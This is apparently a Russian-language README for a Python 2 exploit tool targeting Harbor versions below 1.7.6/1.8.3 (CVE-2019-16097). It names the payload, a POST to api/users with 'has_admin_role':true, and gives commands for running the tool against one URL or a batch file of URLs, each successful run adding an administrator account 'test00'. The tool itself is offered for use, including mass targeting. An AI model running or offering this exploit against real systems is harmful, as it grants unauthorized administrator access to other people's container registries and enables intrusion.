
harbor(<1.7.6/1.8.3) повышение привилегий (CVE-2019-16097)
В сентябре 2019 года в Harbor была обнаружена уязвимость, позволяющая добавлять администраторов через функцию регистрации. Используя интерфейс регистрации api/users и передавая POST-параметр "has_admin_role":true, можно напрямую добавить администратора.
Инструмент поддерживает проверку одного URL или пакетную проверку.
python2.7
pip install requests
Справка по использованию: python harbor-give-me-admin.py -h

Проверка одного URL: python harbor-give-me-admin.py -u "https://www.xxx.com/"
// Если эксплуатация успешна, будет добавлена учетная запись администратора test00, будьте осторожны!

Пакетная проверка: python harbor-give-me-admin.py -f urls,txt
// Если эксплуатация успешна, будет добавлена учетная запись администратора test00, будьте осторожны!
gmail:[email protected]